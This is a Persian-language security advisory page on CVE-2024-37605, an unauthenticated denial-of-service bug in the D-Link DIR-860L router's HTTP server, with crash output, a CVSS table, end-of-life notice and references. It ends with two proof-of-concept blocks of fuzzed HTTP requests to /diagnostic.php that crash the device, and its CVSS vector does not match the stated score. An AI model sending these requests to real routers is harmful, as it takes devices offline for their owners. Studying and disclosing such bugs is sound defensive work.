خانه » CVE-2024-37605

CVE-2024-37605

آسیب پذیری انکار سرویس در روتر D-Link DIR-860L

توسط Vulnerbyte_Alerts

چکیده

این آسیب پذیری مربوط  به  D-Link DIR-860L نسخه 2.04.B04   می باشد که  به نظر می رسد این مشکل بر روی عملکرد المان HTTP Handler   تاثیر خواهد گذاشت.  دستکاری این المان منجر به عدم ارجاع null pointer  می شود. حمله می تواند از راه دور راه اندازی شود. اکسپلویتی برای این حمله در دسترس نمی باشد.

 

توضیحات

یک آسیب پذیری عدم ارجاع null pointer  در D-Link DIR-860L نسخه 2.04.B04 وجود دارد که می تواند مستقیما یک سرور وب در یک دستگاه ریموت بدون احراز هویت از کار بیفتد و نتیجه آن حمله انکار سرویس خواهد بود.

آسیب پذیری در فایل باینری sbin/httpd/ رخ می دهد. زمانی که sbin/httpd/ درخواست HTTP  که با دقت ساخته شده باشد را دریافت کند به دلیل ارجاع به یک null pointer  از کار می افتد.

خروجی که در زمان از کار افتادن برنامه نشان داده می شود به شکل زیر است:


/sbin/httpd: libc/misc/ctype/ctype.c: 281: tolower: Assertion `((((unsigned int)((c) – 0)) <= ((127 * 2 + 1) – 0)) || ((c) == (-1)))’ failed.
qemu: uncaught target signal 6 (Aborted) – core dumped


به نظر می رسد که این آسیب پذیری ناشی از پردازش هدر HTTP  می باشد و ارتباطی به فایل دستکاری شده که بر روی دستگاه بارگذاری شده است ندارد.  این مشکل می تواند بدون انجام هیچ گونه احراز هویتی ایجاد شود.

سیستم امتیاز دهی آسیب پذیری ها بر اساس استاندارد های تحقیقاتی حوزه نمره دهی به آسیب پذیری ها، امتیازات زیر را برای شدت اثرگذاری این آسیب پذیری در نظر گرفته است.

 

Score Severity Version Vector String
6.5 MEDIUM 3.0 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

 

محصولات آسیب پذیر

در زمان انتشار این اعلامیه، محصولات زیر در معرض این آسیب پذیری قرار دارند:

 

  • D-Link DIR-860L 04.B04_ic5b

نرم افزار اصلاح شده

کلیه نسخه های سخت افزاری D-Link DIR-860L به پایان چرخه تولید و سرویس دهی خود رسیده اند. آسیب پذیری های متعددی در مورد این محصولات گزارش شده است.

منابع مربوط به این محصولات به پایان توسعه خود رسیده اند و دیگر پشتیبانی دریافت نمی کنند. شرکت D-Link  توصیه کرده این محصولات را با محصولاتی که بروزرسانی های نرم افزاری دریافت می کنند جایگزین کنید.

 

 

نتیجه گیری

آسیب پذیری فوق در دسته آسیب پذیری های متوسط (Medium) دسته بندی می شود.  توصیه شده است که به منظور رفع این تهدید، از محصولاتی که بروزرسانی های نرم افزاری دریافت می کنند استفاده کنید.

 

منابع

  1. https://docs.google.com/document/d/1cWlVLaVvr_xzkqbKIXY7EW89hNHE89SSlNtesv6lzl8/edit?tab=t.0#heading=h.hyyv1x19ys9n
  2. https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10397
  3. https://www.cve.org/CVERecord?id=CVE-2024-37605
  4. https://www.cvedetails.com/cve/CVE-2024-37605/
  5. https://vuldb.com/?id.288748
  6. https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-37605&sortby=bydate
  7. https://cwe.mitre.org/data/definitions/476.html
  8. https://cwe.mitre.org/data/definitions/404.html
POC:

PoC1:

POST /diagnostic.php HTTP/1.1
Host:192.16<.0.1
Proxy-Connection: keep-alive
Content-LengE; .NET4.0CA
Content-Tylla/5.0 (co%s%s       <max>20</max>
<count>mpatible; MSIWindows NT 10.0; Tr|dent/7.0; .NET4.0E; .NET4.0C)
WWWWWWWWWWWWWWWWWWWContent-Type: application/x-www-form-urlencoeed
Accept: */*
Origin: http://192.168.0.1
Refere: http://192.168.0.1/tools_checm.dhp
Accept-Encodifg: gzip, deflate
Accept-Language: en.USBen;q=0.9
Cookie: uid=VnvoKJ<81B$E1RZ9

 

PoC2:

nostic.php HTTP/8.1aaaaa
H68.0.gth: 14
aaaaaaaaaa068.G.1.a/5.0 ica{ion2

 

همچنین ممکن است دوست داشته باشید

پیام بگذارید